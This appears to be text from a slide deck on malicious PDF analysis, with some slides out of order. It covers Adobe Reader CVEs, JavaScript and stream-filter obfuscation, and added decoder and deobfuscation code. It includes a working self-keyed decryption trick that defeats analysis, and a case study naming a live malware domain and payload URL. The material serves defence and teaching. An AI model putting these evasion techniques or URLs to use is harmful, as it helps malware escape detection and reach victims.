  – The customDictionaryOpen spell method in the JavaScript API in Adobe Reader 9.1, 8.1.4, 7.1.1, and earlier on Linux and UNIX allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that triggers a call to this method with a long string in the second argument.
45. Vulnerable APIs
• Doc.media.newPlayer [CVE-2009-4324]
  – Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.
• Collab.collectEmailInfo [CVE-2007-5659]
  – Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.
46. Obfuscation Techniques
Why?
To make analysis more difficult
To avoid detection by virus scanners
Ways?
Using JavaScript obfuscation
Using PDF obfuscation (stream filters)
48. Distorting format
Normal code:
function execute(data, time)
{
    Timelag=5000;
    if (time > Timelag)
    {
        // some code
    }
}
function overflow(hex, loop)
{
    for (i=0;i<loop;i++)
    {
        hex = hex + hex;
    }
}
Obfuscated code (the same overflow function with newlines and indentation removed):
function overflow(hex, loop){for (i=0;i<loop;i++){hex = hex + hex;}}
49. Obfuscating Identifiers
Normal code:
function execute(data, time)
{
    Timelag=5000;
    if (time > Timelag)
    {
        // some code
    }
}
function overflow(hex, loop)
{
    for (i=0;i<loop;i++)
    {
        hex = hex + hex;
    }
}
Obfuscated code (every identifier renamed to a confusable string; the logic is unchanged):
function aeiou(lIlIIlI, O0OOOO0OO000OO)
{
    WWMWMWMWMWMW=5000;
    if (O0OOOO0OO000OO > WWMWMWMWMWMW)
    {
        // some code
    }
}
function aimpq(xxwmnnx, pqrtxw)
{
    for (dqweaa=0; dqweaa < pqrtxw; dqweaa ++)
    {
        xxwmnnx = xxwmnnx + xxwmnnx;
    }
}
50. Obfuscating Identifiers – Even Worse
Identifiers differ only in the number of underscore characters:
function _____(____,__________)
{
    ______________=5000;
    if (__________>______________)
    {
        // some code
    }
}
function ___(_______, ______)
{
    for(________________=0; ________________<______; ________________ ++)
    {
        _______ = _______ + _______;
    }
}
51. Obfuscating Identifiers – Even Worse
The same code on one line (the placeholder comment becomes a block comment, since a // comment would swallow the rest of the line):
function _____(____,__________){______________=5000;if (__________>______________){/* some code */}}function ___(_______, ______){for(________________=0; ________________<______; ________________ ++){_______ = _______ + _______;}}
52. Chain of Eval
Normal code:
app.alert("c0c0n")
Obfuscated code (each stage is a string that evaluates the previous one; only the innermost string contains the real call):
func=eval;
one='app.alert("c0c0n")';
two='eval(one)';
three='eval(two)';
eval(func(three));
54. Callee Trick
A function accesses its own source and uses it as a key to decrypt code or data, so any edit to the function (a breakpoint, an inserted print, beautified whitespace) changes the key and breaks the decryption.
function decrypt(cypher)
{
    var key = arguments.callee.toString();   // the function's own source text
    var plain = "";
    for (var i = 0; i < cypher.length; i++)
    {
        plain += String.fromCharCode(key.charCodeAt(i % key.length) ^ cypher.charCodeAt(i));
    }
    ...
}
55. PDF obfuscations
Using filters for streams. The most common encodings are ASCIIHexDecode, ASCII85Decode, LZWDecode, FlateDecode and RunLengthDecode. Filters can be chained: /Filter [/ASCIIHexDecode /FlateDecode] means the reader applies ASCIIHexDecode first and then FlateDecode, so the JavaScript in a /JS stream never appears as plaintext anywhere in the file.
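Filters are the flip side of the evasion above: the reader decodes them transparently, while a string search over the raw file sees only encoded bytes. As an added example (not the deck's code), this Python script pulls each stream out of a file, reads its /Filter entry (a single name or an array applied in order) and decodes it with four of the five filters the slide lists; LZWDecode is deliberately left unimplemented here and raises, so a skipped filter is never mistaken for plaintext. The sample file is constructed inline: the deck's app.alert("c0c0n") one-liner, Flate-compressed and then hex-encoded, so that "app.alert" does not occur anywhere in the raw bytes.

```python
"""Decode PDF stream filter chains to expose the script they hide.

Added example, not the deck's code. The sample file is constructed below.
"""
import base64
import re
import zlib

# A stream is "obj << dict >> stream\n ... \nendstream"; the tempered (?!endobj)
# keeps the dictionary match from running across object boundaries.
STREAM_RE = re.compile(
    rb"obj\s*<<((?:(?!endobj).)*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)
FILTER_RE = re.compile(rb"/Filter\s*(\[[^\]]*\]|/\w+)")


def ascii_hex_decode(data: bytes) -> bytes:
    """ASCIIHexDecode: hex digits, whitespace ignored, '>' is EOD;
    an odd final digit is treated as if followed by 0."""
    digits = re.sub(rb"[^0-9A-Fa-f>]", b"", data).split(b">")[0]
    if len(digits) % 2:
        digits += b"0"
    return bytes.fromhex(digits.decode())


def ascii85_decode(data: bytes) -> bytes:
    """ASCII85Decode: optional <~ prefix, ~> is EOD, whitespace ignored."""
    body = re.sub(rb"\s", b"", data)
    if body.startswith(b"<~"):
        body = body[2:]
    return base64.a85decode(body.split(b"~>")[0])


def run_length_decode(data: bytes) -> bytes:
    """RunLengthDecode: length byte L; L<128 copies the next L+1 bytes,
    L>128 repeats the next byte 257-L times, L==128 is EOD."""
    out, i = bytearray(), 0
    while i < len(data):
        length = data[i]
        if length == 128:
            break
        if length < 128:
            out += data[i + 1:i + 2 + length]
            i += 2 + length
        else:
            out += bytes([data[i + 1]]) * (257 - length)
            i += 2
    return bytes(out)


DECODERS = {
    b"/ASCIIHexDecode": ascii_hex_decode,
    b"/ASCII85Decode": ascii85_decode,
    b"/FlateDecode": zlib.decompress,
    b"/RunLengthDecode": run_length_decode,
    # /LZWDecode is intentionally absent: decode_stream raises on it.
}


def filter_chain(stream_dict: bytes) -> list:
    """Filters in the order they must be applied when decoding."""
    m = FILTER_RE.search(stream_dict)
    return re.findall(rb"/\w+", m.group(1)) if m else []


def decode_stream(stream_dict: bytes, raw: bytes) -> bytes:
    data = raw
    for name in filter_chain(stream_dict):
        if name not in DECODERS:
            raise NotImplementedError(f"filter {name.decode()} not supported here")
        data = DECODERS[name](data)
    return data


def decoded_streams(pdf: bytes) -> list:
    """[(filter chain, decoded bytes)] for every stream in the file."""
    return [(filter_chain(d), decode_stream(d, raw))
            for d, raw in STREAM_RE.findall(pdf)]


SCRIPT = b'app.alert("c0c0n")'   # the deck's one-liner, used as the hidden payload


def make_sample() -> bytes:
    """Constructed file: SCRIPT Flate-compressed, then ASCIIHex-encoded."""
    encoded = zlib.compress(SCRIPT).hex().upper().encode() + b">"
    stream_obj = (b"2 0 obj << /Length %d /Filter [/ASCIIHexDecode /FlateDecode] >>\n"
                  b"stream\n" % len(encoded)) + encoded + b"\nendstream\nendobj\n"
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /OpenAction << /S /JavaScript /JS 2 0 R >> >> endobj\n"
            + stream_obj)


if __name__ == "__main__":
    for chain, content in decoded_streams(make_sample()):
        print([c.decode() for c in chain], "->", content)
```

The regex approach ignores /Length on purpose: the evasion slides show that malformed files are tolerated by the reader, so a triage tool that trusts the declared length misses streams a lenient parser will still decode.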
56. Case Study
Malware found from: www.malwaredomainlist.com
File link: www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
Added on: 29th July 2010
60. STEP-2
Behavioral analysis
Environment
• A VM image
• Filemon, Process Monitor, Regmon, TCPView
Results
• The process 'AcroRd32.exe' was trying to connect to the remote site http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on (the spl= parameter names the exploit used, newPlayer from slide 45, and exe.php serves the executable payload)
71. How can we protect ourselves
• Enable automatic updates: it sounds simple, but you will need to turn it on in the software settings to make it happen by default.
• Disable PDF browser integration: most browsers will open PDFs without asking. An infected PDF will deliver its payload without warning, hiding in the background.
• Always install the latest patch/update, even for older Adobe product versions.
• Disable JavaScript.
• Uncheck 'Allow non-PDF file attachments with external applications' to prevent the launch action vulnerability.
• PDF alternatives such as Foxit are worthwhile, as long as auto updates are turned on; however, alternative programs become just as attractive to malware authors as they gain popularity.
72. Road Ahead
Focus less on JavaScript exploits
Attackers focusing more on embedded objects inside PDF, i.e. Flash
Adobe to introduce sandboxing to limit Reader exploits
THE ADOBE PORTABLE DOCUMENT FORMAT (PDF) is a file format for representing documents in a manner independent of the application software, hardware, and operating system used to create them and of the output device on which they are to be displayed or printed. A document's pages (and other visual elements) may contain any combination of text, graphics, and images. A page's appearance is described by a PDF content stream, which contains a sequence of graphics objects to be painted on the page. This appearance is fully specified; all layout and formatting decisions have already been made by the application generating the content stream. In addition to describing the static appearance of pages, a PDF document may contain interactive elements that are possible only in an electronic representation. PDF supports annotations of many kinds for such things as text notes, hypertext links, markup, file attachments, sounds, and movies. A document can define its own user interface; keyboard and mouse input can trigger actions that are specified by PDF objects. The document can contain interactive form fields to be filled in by the user, and can export the values of these fields to or import them from other applications.
Most common obfuscation techniques
Distorting format – removing newlines and spaces. Not much of a pain to deobfuscate (e.g. jsbeautifier.org).
Name obfuscation – variable names and function names are renamed.
JavaScript code can execute JavaScript code in strings through eval
• Often used to hide later code stages which are decrypted on the fly
• Common way to extract the argument: replace eval with a printing function
Not specific to Adobe Reader
• Frequently used by JavaScript code in other contexts
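The "replace eval with a printing function" step, applied to the slide 52 chain, as an added example that is not part of the deck. Rather than printing, the hook records every string handed to eval before evaluating it, so each decrypted-on-the-fly stage is captured in order. `app` is a stand-in for Acrobat's app object, and both samples are constructed: the first is the slide 52 chain, the second hides its stage as character codes.

```javascript
// Added example, not from the deck: eval replaced by a recording hook so each
// stage is logged before it runs. `app` is a stand-in for Acrobat's app object;
// both samples are constructed.
function runWithEvalHook(source) {
  const stages = [];
  const alerts = [];
  const app = { alert: (msg) => { alerts.push(String(msg)); } };

  // Records the code handed to eval, then evaluates it with a direct eval from
  // this scope so the stage can see `app`. Non-string arguments are returned
  // unchanged, which is what the engine's eval does with them.
  function recordingEval(code) {
    if (typeof code !== 'string') return code;
    stages.push(code);
    return eval(code); // eslint-disable-line no-eval
  }

  // The sample runs with `eval` shadowed by the hook, so `func=eval`, `eval(x)`
  // and the like all reach recordingEval instead of the engine's eval.
  const sandboxed = new Function('eval', 'app', source); // eslint-disable-line no-new-func
  sandboxed(recordingEval, app);
  return { stages, alerts };
}

// Slide 52 chain, reproduced as a constructed sample.
const SAMPLE_CHAIN = [
  'func=eval;',
  'one=\'app.alert("c0c0n")\';',
  'two=eval(one);',
  'three=eval(two);',
  'eval(func(three));',
].join('\n');

// A stage hidden as character codes and decoded on the fly, built here from
// the plain text so the numbers are right.
const SAMPLE_HIDDEN = 'eval(String.fromCharCode(' +
  Array.from('app.alert("hidden")', (c) => c.charCodeAt(0)).join(',') + '));';

console.log(runWithEvalHook(SAMPLE_CHAIN));
console.log(runWithEvalHook(SAMPLE_HIDDEN));
```

For a real sample the hook would record only and not evaluate, since the point of the exercise is to see the next stage without running it; the chain shows why the slide's four evals collapse to a single recorded stage, as the later calls receive undefined rather than code.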
• Function accesses its own source and uses it as a key to decrypt code or data
• Add a single whitespace and decryption fails
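The callee trick from slide 54 as working code, together with the check behind "add a single whitespace and decryption fails"; this is an added example, not code from the deck. The key is the decrypt function's own source text. The slide reads it through `arguments.callee.toString()`, which only non-strict code allows; this version reads the same text through the function's name so it also runs in strict or module code. The secret is a constructed sample.

```javascript
// Added example, not from the deck: a self-keyed XOR decrypt in the style of the
// callee trick, plus the analyst's check that the key depends on the exact
// source text. The secret below is a constructed sample.
function xorStrings(text, key) {
  // Character-wise XOR of two strings. Where the key runs out, charCodeAt gives
  // NaN, which XOR treats as 0, so the text passes through unchanged from there.
  var out = '';
  for (var i = 0; i < text.length; i++) {
    out += String.fromCharCode(text.charCodeAt(i) ^ key.charCodeAt(i));
  }
  return out;
}

function selfKeyedDecrypt(cypher) {
  var key = selfKeyedDecrypt.toString(); // the function's own source is the key
  return xorStrings(cypher, key);
}

// What the sample's author would do once: encrypt against the exact source text.
function selfKeyedEncrypt(plain) {
  return xorStrings(plain, selfKeyedDecrypt.toString());
}

// Analyst view: the same cipher text decrypted with the verbatim source and with
// a copy that differs by one leading space, as a beautifier would leave it.
function compareKeys(cypher) {
  var verbatim = selfKeyedDecrypt.toString();
  return {
    withVerbatimSource: xorStrings(cypher, verbatim),
    withOneExtraSpace: xorStrings(cypher, ' ' + verbatim),
  };
}

var demoSecret = 'app.alert("callee")';
var demoCipher = selfKeyedEncrypt(demoSecret);
console.log(selfKeyedDecrypt(demoCipher) === demoSecret);
console.log(compareKeys(demoCipher));
```

The practical consequence for analysis is that the function must be extracted byte-for-byte from the stream and evaluated as-is; any reformatting, even pretty-printing the whole file first, changes the key and yields garbage.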
Online decoders are available to decode them.
We cannot hit the PDF file link directly, so we chose wget to download the file contents.
JavaScript found in object 11 0, encoded with ASCII85 encoding. First obfuscation – filters.
Second obfuscation – distorted formatting.
Third obfuscation – obfuscated identifiers and unnecessary comments.